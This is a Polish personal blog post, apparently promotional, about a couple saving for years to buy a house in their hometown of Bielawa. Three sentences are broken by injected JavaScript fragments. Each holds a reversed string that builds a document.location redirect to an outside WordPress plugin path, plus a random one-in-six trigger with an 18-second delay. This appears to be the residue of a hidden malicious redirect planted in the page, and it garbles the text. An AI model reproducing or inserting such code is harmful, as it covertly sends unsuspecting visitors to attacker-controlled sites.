Dom w Bielawie

Przez wiele lat wraz z żoną oszczędzaliśmy niemal każdy grosz. Dlaczego? Mieliśmy z tyłu głowy cel, który sobie postawiliśmy. Chcieliśmy bowiem zebrać wystarczającą sumę pieniędzy, która pozwoliłaby nam na zakup wymarzonego domu w naszej rodzinnej Bielawie. Jesteśmy bardzo związani ze swoim miastem i nie wyobrażaliśmy sobie mieszkać gdziekolwiek indziej.

Zakup domu w Bielawie

domy w BielawieMuszę przyznać, że oszczędzanie przez kilka lat dało się we znaki zarówno mnie, jak i mojej żonie. Mieliśmy już nieco dosyć odmawiania sobie każdej przyjemności. W końcu jednak gdy zebraliśmy sumę, która pozwalała nam na zakup wymarzonych czterech kątów, wyraźnie odżyliśmy. Interesowały nas jedynie domy w Bielawie. Jest toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to nasze rodzinne miastoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, w którym się wychowywaliśmy. Tam też chodziliśmy do liceum, w którym poznaliśmy się wraz z żoną. Był toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to piękny początek naszej znajomości, który zaprowadził nas po kilku latach przed ołtarz. Gdy wreszcie zebraliśmy odpowiednią sumę, udaliśmy się do tamtejszego biura nieruchomości, by wykwalifikowani pracownicy przedstawili nam ofertę domów w Bielawie. Takową też otrzymaliśmy. Kilka domów zwróciło naszą wyjątkową uwagę. Postanowiliśmy je odwiedzić. Później, przez kilka dni intensywnie się zastanawialiśmy, który z nich powinien stać się naszym miejscem na ziemi. Po burzliwych dyskusjach i radach ze strony najbliższej rodziny, w końcu podjęliśmy odpowiednią decyzję.

Teraz kiedy wprowadziliśmy się już do naszego nowego domu w Bielawie, jesteśmy z żoną bardzo szczęśliwi. Żyjemy bardzo swobodnie, ponieważ nie musimy już oszczędzać. Cieszymy się życiem i ciągle upiększamy nasz nowy dom. Mamy nadzieję, że przez długie lata będziemy cieszyć się wspólnym szczęściem właśnie w jego murach. Póki co, nie mogliśmy sobie wymarzyć piękniejszego zakończenia naszej batalii z oszczędzaniem!